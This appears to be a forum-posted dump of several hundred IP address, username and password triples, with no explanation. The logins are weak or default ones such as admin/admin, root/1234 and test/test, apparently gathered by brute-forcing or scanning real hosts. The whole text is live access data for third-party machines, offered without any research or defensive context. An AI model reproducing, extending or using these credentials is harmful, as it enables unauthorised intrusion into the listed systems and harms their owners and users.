67.136.40.114,info,info 67.137.109.147,info,info 67.137.33.116,webmaster,webmaster 67.14.192.22,service,service 67.14.228.34,sales,sales 67.14.228.37,support,support 67.141.177.100,sales,password 67.148.135.139,support,support 67.148.9.178,info,info 67.15.43.184,webmaster,webmaster 67.15.58.165,info,123456 67.15.58.165,sales,123456 67.15.60.34,info,info 67.151.115.114,service,service 67.151.183.234,admin,admin 67.151.183.234,guest,password 67.151.183.234,info,[null] 67.151.183.234,sales,[null] 67.151.183.234,service,service123 67.151.183.234,support,support123 67.151.183.234,test,test 67.151.183.234,webmaster,[null] 67.151.197.1,admin,[null] 67.151.197.1,guest,guest 67.151.197.1,info,info 67.151.197.1,sales,[null] 67.151.197.1,service,[null] 67.151.197.1,support,[null] 67.151.197.1,test,[null] 67.151.197.1,webmaster,[null] 67.152.190.115,info,info 67.152.74.130,test,test 67.158.119.251,sales,sales 67.158.123.182,test,password 67.18.132.163,support,123456 67.18.132.166,support,123456 67.18.198.26,test,test123 68.109.237.137,mike,mike 68.115.134.166,michael,1234 68.115.248.91,test,test 68.14.253.37,john,john 68.14.253.37,steve,steve 68.143.194.140,info,info 68.143.27.2,temp,temp 68.144.66.160,test,test 68.145.108.170,linda,linda123 68.146.204.56,mike,mike 68.15.211.186,admin,admin 68.15.211.186,sales,sales12 68.153.118.93,test,test 68.153.119.15,test,test 68.16.184.3,carol,carol123 68.16.30.7,david,password 68.16.30.7,jennifer,password 68.16.30.7,jerry,password 68.164.254.18,abuse,abuse 68.165.255.226,abuse,12345 68.165.255.226,info,12345 68.166.185.150,sales,sales 68.166.50.34,admin,admin 68.167.107.244,test,test 68.167.167.130,administrator,password 68.167.168.50,test,test 68.169.45.240,admin,admin 68.17.119.233,training,1234 68.171.47.155,info,password 68.179.120.243,richard,richard 68.179.74.235,webmaster,webmaster 68.213.181.78,chris,password 68.236.217.160,test,test 68.250.78.2,training,training 68.55.220.123,root,1234 68.88.213.137,temp,password 68.98.211.45,john,john 69.0.7.62,james,password 69.0.7.62,matt,password 69.0.7.62,tim,password 69.128.124.250,shop,password 69.13.80.220,joe,joe 69.13.80.220,server,server 69.13.80.220,service,service 69.13.80.220,test1,test 69.13.80.220,testing,test 69.13.80.5,joe,joe 69.13.80.5,service,service 69.13.80.5,test1,test 69.13.80.96,joe,joe 69.13.80.96,service,service 69.13.80.96,test1,test 69.13.80.96,testing,test 69.13.81.176,joe,joe 69.13.81.176,server,server 69.13.81.176,test1,test 69.13.81.176,testing,test 69.13.81.248,joe,joe 69.13.81.248,test1,test 69.13.81.248,testing,test 69.13.81.48,joe,joe 69.13.81.48,service,service 69.13.81.48,test1,test 69.13.81.48,testing,test 69.13.81.98,joe,joe 69.13.81.98,server,server 69.13.81.98,service,service 69.13.81.98,test1,test 69.13.81.98,testing,test 69.13.82.132,joe,joe 69.13.82.132,test1,test 69.13.82.132,testing,test 69.13.82.192,joe,joe 69.13.82.192,server,server 69.13.82.192,service,service 69.13.82.192,test1,test 69.13.82.192,testing,test 69.13.82.43,joe,joe 69.13.82.43,server,server 69.13.82.43,test1,test 69.13.82.43,testing,test 69.13.84.139,admin,admin 69.13.84.80,admin,admin 69.13.85.174,admin,admin 69.13.85.224,admin,admin 69.13.85.24,admin,admin 69.13.85.98,admin,admin 69.13.86.118,richard,richard 69.13.86.178,richard,richard 69.13.86.54,richard,richard 69.13.87.11,richard,richard 69.13.87.136,richard,richard 69.13.87.212,richard,richard 69.13.87.62,richard,richard 69.13.88.156,larry,12345 69.13.88.216,larry,12345 69.13.88.216,sale,sale 69.13.88.6,larry,12345 69.13.88.92,sale,sale 69.13.89.100,larry,12345 69.13.89.171,larry,12345 69.13.89.171,sale,sale 69.13.89.48,larry,12345 69.13.89.48,sale,sale 69.13.90.128,larry,12345 69.13.90.128,sale,sale 69.13.90.194,larry,12345 69.13.90.194,sale,sale 69.13.90.252,larry,12345 69.13.90.44,larry,12345 69.13.90.44,sale,sale 69.13.91.138,larry,12345 69.13.91.208,larry,12345 69.13.91.208,sale,sale 69.13.91.84,larry,12345 69.13.91.84,sale,sale 69.13.92.164,java,java 69.13.92.232,java,java 69.13.92.32,java,java 69.13.92.82,java,java 69.13.93.120,java,java 69.13.93.176,java,java 69.13.93.244,java,java 69.13.93.32,java,java 69.147.246.84,spider,123456 69.175.12.76,seller,123456 69.2.196.154,mail,abc123 69.2.196.94,mail,abc123 69.24.124.135,jessica,temp 69.38.57.42,admin,password 69.38.57.42,john,password 69.38.57.42,larry,password 69.38.66.38,frank,123456 69.38.66.38,george,george 69.38.66.38,mark,123456 69.38.66.38,michael,password 69.39.6.10,website,website 69.39.67.82,demo,test123 69.42.217.233,test2,123456 69.56.229.250,spam,12345 69.65.56.176,nancy,abc123 69.65.56.176,spider,123456 69.67.189.206,,123456 69.67.189.6,,123456 69.67.189.69,,123456 69.67.191.44,,123456 69.67.191.94,,123456 69.70.51.58,info,info 69.70.51.58,jim,jim 69.90.136.146,,12345 69.93.197.172,gary,changeme 69.93.203.86,welcome,12345 69.94.105.100,test,test 69.94.21.140,jim,jim123 69.94.21.140,office,office12 69.94.48.30,jennifer,jennifer12 72.0.199.186,test,test123 72.0.199.190,admin,12345 72.0.199.190,carol,carol123 72.0.199.190,info,info 72.1.197.8,chris,chris 72.10.139.162,info,12345 72.10.139.162,sales,12345 72.10.139.216,canon,password 72.10.145.130,test,test 72.10.146.50,michael,michael 72.10.34.254,nicole,nicole 72.10.55.239,andrew,andrew 72.10.6.48,allison,password 72.10.6.48,mark,password 72.10.6.48,mike,password 72.11.103.236,sales,sales 72.11.209.3,canon,canon123 72.11.241.219,mike,password 72.11.68.58,john,john123 72.11.71.190,info,password 72.11.72.20,tom,tom 72.11.88.214,admin,admin 72.11.88.214,chris,chris 72.11.88.214,tom,tom 72.12.10.162,angela,angela 72.12.197.165,sales,sales 72.12.197.165,training,training 72.12.202.141,steve,steve 72.12.219.4,test,password 72.12.55.62,linda,linda123 72.12.84.114,info,info 72.13.231.184,linda,linda 72.13.95.172,admin,admin 72.14.0.207,mike,password 72.14.140.254,mark,mark 72.14.172.197,james,password 72.14.172.197,jim,password 72.14.172.197,linda,password 72.14.177.175,test,test 72.15.152.121,lindsay,lindsay 72.15.152.15,lindsay,lindsay 72.15.55.131,admin,admin 72.15.55.131,training,training 72.16.117.66,abuse,abuse 72.16.117.66,test,test 72.16.117.71,abuse,abuse 72.16.117.71,test,test 72.16.128.59,john,john 72.16.129.148,test,test 72.16.157.230,admin,admin 72.16.162.138,info,password 72.16.175.91,sales,sales 72.16.181.3,temp,temp 72.16.183.154,admin,admin 72.16.185.147,sales,password 72.16.188.172,jerry,password 72.16.188.172,john,password 72.16.205.130,sarah,sarah 72.16.208.107,richard,richard 72.16.216.233,test,password 72.16.219.5,test,test123 72.16.224.200,jim,jim 72.16.224.200,michael,michael 72.16.226.194,info,password 72.167.45.137,info,qwerty 72.17.159.70,abuse,abuse 72.17.184.242,james,james 72.17.201.82,intern,intern 72.17.210.82,temp,temp 72.17.237.35,carol,carol 72.17.240.250,jim,password 72.172.128.210,info,qwerty 72.172.128.35,info,info123 72.172.131.144,steve,password -------------------- 72.172.131.40,amanda,amanda 72.172.131.40,andrew,andrew 72.172.83.23,test,test 72.175.161.162,test,1234 72.18.145.101,account,account123 72.18.229.132,test,test 72.18.233.132,abuse,abuse 72.18.234.21,info,info123 72.18.235.242,abuse,1234 72.18.95.11,admin,admin 72.19.16.234,richard,password 72.19.166.148,john,john 72.2.217.150,test,test 72.2.52.5,abuse,abuse 72.20.65.19,michelle,michelle 72.214.1.163,test,test 72.214.1.34,info,info 72.214.1.34,john,john 72.214.132.66,info,info 72.214.132.98,jennifer,jennifer 72.214.17.98,sarah,sarah123 72.214.2.10,jim,1234 72.214.2.211,chris,password 72.214.2.211,jennifer,password 72.214.2.211,mike,password 72.214.2.211,steve,password 72.214.2.211,test,password 72.214.241.247,patrick,patrick 72.214.241.247,steve,steve 72.214.248.123,carol,carol 72.214.248.123,cindy,cindy 72.214.248.123,jennifer,jennifer 72.214.248.124,carol,carol 72.214.248.124,cindy,cindy 72.214.248.124,jennifer,jennifer 72.214.255.109,chris,password 72.215.138.85,intern,intern 72.215.148.162,info,password 72.215.200.148,patrick,patrick 72.215.215.235,jennifer,password 72.215.251.28,info,info 72.22.238.130,guest,guest 72.22.73.47,temp,qwerty 72.22.73.66,general,password 72.22.73.66,harley,password 72.22.73.66,helen,password 72.22.8.3,mike,password 72.22.83.205,mark,12345 72.22.88.156,david,password 72.22.88.156,james,password 72.22.89.66,mike,password 72.22.89.66,sales,password 72.22.89.66,test,password 72.232.186.226,canon,password 72.232.217.228,steve,password 72.232.221.92,canon,password 72.232.221.92,sales,password 72.232.245.82,kelsey,kelsey 72.232.245.82,sales,sales 72.232.245.85,kelsey,kelsey 72.232.245.85,sales,sales 72.233.37.244,abuse,abuse 72.235.114.9,temp,temp 72.235.123.177,info,info 72.235.236.253,cindy,1234 72.235.236.253,info,1234 72.236.116.110,sales,sales 72.236.213.10,michelle,michelle 72.236.213.6,michelle,michelle 72.236.213.8,michelle,michelle 72.236.213.9,michelle,michelle 72.237.104.4,chuck,12345 72.237.104.4,mike,administrator 72.237.117.68,mike,mike 72.237.208.32,john,john123 72.237.208.37,sales,sales 72.237.208.37,tom,1234 72.237.208.37,webmaster,webmaster 72.237.209.197,john,john123 72.237.210.101,tom,1234 72.237.210.101,webmaster,webmaster 72.237.210.102,sales,sales 72.237.210.102,tom,1234 72.237.210.102,webmaster,webmaster 72.237.210.103,sales,sales 72.237.210.103,tom,1234 72.237.210.104,sales,sales 72.237.210.104,tom,1234 72.237.210.104,webmaster,webmaster 72.237.210.107,sales,sales 72.237.210.107,tom,1234 72.237.210.107,webmaster,webmaster 72.237.210.108,tom,1234 72.237.210.108,webmaster,webmaster 72.237.210.109,sales,sales 72.237.210.109,tom,1234 72.237.210.109,webmaster,webmaster 72.237.210.110,sales,sales 72.237.210.110,tom,1234 72.237.210.118,john,john123 72.237.210.123,john,john123 72.237.210.125,john,john123 72.237.210.128,john,john123 72.237.210.131,john,john123 72.237.210.136,john,john123 72.237.210.146,john,john123 72.237.210.150,john,john123 72.237.210.155,john,john123 72.237.210.163,john,john123 72.237.210.168,john,john123 72.237.210.176,john,john123 72.237.210.178,john,john123 72.237.210.181,john,john123 72.237.210.182,john,john123 72.237.210.20,sales,sales 72.237.210.20,webmaster,webmaster 72.237.210.21,sales,sales 72.237.210.21,tom,1234 72.237.210.21,webmaster,webmaster 72.237.210.211,john,john123 72.237.210.212,john,john123 72.237.210.213,john,john123 72.237.210.220,john,john123 72.237.210.50,sales,sales 72.237.210.50,tom,1234 72.237.210.50,webmaster,webmaster 72.237.210.54,sales,sales 72.237.210.54,tom,1234 72.237.210.54,webmaster,webmaster 72.237.210.57,sales,sales 72.237.210.57,tom,1234 72.237.210.57,webmaster,webmaster 72.237.210.58,sales,sales 72.237.210.58,tom,1234 72.237.210.58,webmaster,webmaster 72.237.210.59,sales,sales 72.237.210.59,tom,1234 72.237.210.59,webmaster,webmaster 72.237.210.62,sales,sales 72.237.210.62,webmaster,webmaster 72.237.210.65,sales,sales 72.237.210.65,tom,1234 72.237.210.65,webmaster,webmaster 72.237.210.70,sales,sales 72.237.210.70,tom,1234 72.237.210.70,webmaster,webmaster 72.237.210.72,sales,sales 72.237.210.72,tom,1234 72.237.210.72,webmaster,webmaster 72.237.210.73,sales,sales 72.237.210.73,tom,1234 72.237.210.73,webmaster,webmaster 72.237.210.78,sales,sales 72.237.210.78,tom,1234 72.237.210.78,webmaster,webmaster 72.237.210.79,sales,sales 72.237.210.79,tom,1234 72.237.210.79,webmaster,webmaster 72.237.210.80,sales,sales 72.237.210.80,tom,1234 72.237.210.80,webmaster,webmaster 72.237.210.81,sales,sales 72.237.210.81,tom,1234 72.237.210.81,webmaster,webmaster 72.237.210.82,sales,sales 72.237.210.82,tom,1234 72.237.210.82,webmaster,webmaster 72.237.210.84,sales,sales 72.237.210.84,tom,1234 72.237.210.84,webmaster,webmaster 72.237.210.85,tom,1234 72.237.210.85,webmaster,webmaster 72.237.210.86,tom,1234 72.237.210.87,sales,sales 72.237.210.87,tom,1234 72.237.210.87,webmaster,webmaster 72.237.210.88,sales,sales 72.237.210.88,tom,1234 72.237.210.88,webmaster,webmaster 72.237.210.89,sales,sales 72.237.210.89,tom,1234 72.237.210.89,webmaster,webmaster 72.237.210.90,sales,sales 72.237.210.90,tom,1234 72.237.210.90,webmaster,webmaster 72.237.210.91,sales,sales 72.237.210.91,tom,1234 72.237.210.91,webmaster,webmaster 72.237.210.92,sales,sales 72.237.210.92,tom,1234 72.237.210.92,webmaster,webmaster 72.237.210.93,sales,sales 72.237.210.93,tom,1234 72.237.210.93,webmaster,webmaster 72.237.210.94,sales,sales 72.237.210.94,tom,1234 72.237.210.94,webmaster,webmaster 72.237.210.96,sales,sales 72.237.210.96,tom,1234 72.237.210.96,webmaster,webmaster 72.237.210.98,sales,sales 72.237.210.98,tom,1234 72.237.210.98,webmaster,webmaster 72.237.210.99,sales,sales 72.237.210.99,tom,1234 72.237.210.99,webmaster,webmaster 72.237.76.53,mike,password 72.237.88.228,abuse,abuse 72.237.90.228,abuse,abuse 72.24.45.202,test,test 72.24.65.139,linda,password 72.240.120.83,webmaster,webmaster 72.240.121.152,general,password 72.240.123.58,temp,password 72.240.22.188,richard,password 72.240.22.188,test,test 72.240.22.82,steve,steve 72.240.31.98,test,test 72.242.100.162,intern,intern 72.242.101.11,mike,mike 72.242.124.38,test,test 72.242.124.4,test,test 72.242.124.6,test,test 72.242.167.200,jennifer,jennifer 72.242.194.90,info,info 72.242.22.202,info,info 72.242.56.179,michelle,michelle 72.243.100.149,mark,mark 72.243.105.50,chris,password 72.243.105.50,mark,password 72.243.105.50,richard,password 72.243.105.50,steve,password 72.243.107.10,nicole,nicole 72.243.109.58,test,password 72.243.112.19,sales,1234 72.243.169.170,canon,canon 72.243.208.242,test,password 72.243.22.171,intern,intern 72.243.231.155,admin,admin 72.243.248.34,richard,richard 72.243.29.27,test,test123 72.243.66.218,sales,sales 72.243.84.132,info,info 72.244.102.18,info,info 72.244.137.194,intern,intern 72.244.166.2,root,password 72.244.174.135,admin,admin 72.244.175.50,angela,angela123 72.244.175.50,chris,chris123 72.244.211.234,info,info 72.244.226.27,test,password 72.244.31.140,info,info 72.245.136.36,admin,admin 72.245.180.18,info,12345 72.245.189.106,info,info 72.245.218.130,mark,12345 72.245.221.90,mark,mark
×
×
  • Create New...